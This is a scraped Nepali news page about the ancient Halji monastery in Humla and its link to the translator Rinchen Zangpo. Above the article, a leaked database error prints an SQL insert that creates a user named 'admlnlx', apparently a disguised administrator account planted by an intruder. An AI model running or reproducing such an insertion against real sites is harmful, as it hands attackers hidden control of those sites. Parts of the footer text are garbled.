WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRi6JM/Y18iADBUN5Yad/5aUqCi.NJ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 03:10:46', '', 'admlnlx', 'admlnlx')

हजार वर्ष पुरानो हल्जी गुम्बा – Gaule Khabar

हजार वर्ष पुरानो हल्जी गुम्बा

हजार वर्ष पुरानो हल्जी गुम्बा

कचहरी डट कम, हुम्ला ।।

लिमीको तीन गाउँमध्ये अति पुरानो गाउँ हल्जी हो । यो गाउँमा रहेको करीब एक हजार वर्ष पुरानो हल्जी गुम्बामा कर्नाली प्रदेशका अति पुराना कागजातहरु रहेको विभिन्न त्यहाँका ऐतिहासिक तथा पौराणिक कुराहरुबाट थाहा भएको छ । यहाँको हल्जी गुम्बाको वास्तविक नाम रिन्छेलिन गुम्वा  हो ।

यो एघारौं शताब्दिका महान अनुवादक तथा यात्री रिन्छेन गाङपोको जीवनकाल कै १०८ वटा गुम्बाहरुमध्येको अन्तिम र उल्लेख्य महत्वको स्थान र समाधि समेत हो । यहाँको पबित्र माटोमा नै उनको देहले अलौकिक शक्ति प्राप्त गरेको थियो । आज पनि यो गुम्बाले मानवीयता, संवेदनशिलता, आत्मीयता, बौद्घिकता, तार्किकता, पृथक भौगोलिकता, अगल र उत्कष्ट सांस्कृतिक कुराको प्रतिनिधित्व गरेको छ ।

यसले नौलो भाषा, संस्कृति र सम्पदाको परिचय बोकेको छ । तर पनि देशको संक्रमणकालीन अवस्थाले विभिन्न महत्व बोकेका निधि र विधिहरु ओझेलमा पर्दै गएका छन् । यदि खोजीनीति हुन सकेमा नेपालका लागि नयाँ कुराको मौलिकता झल्कने छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका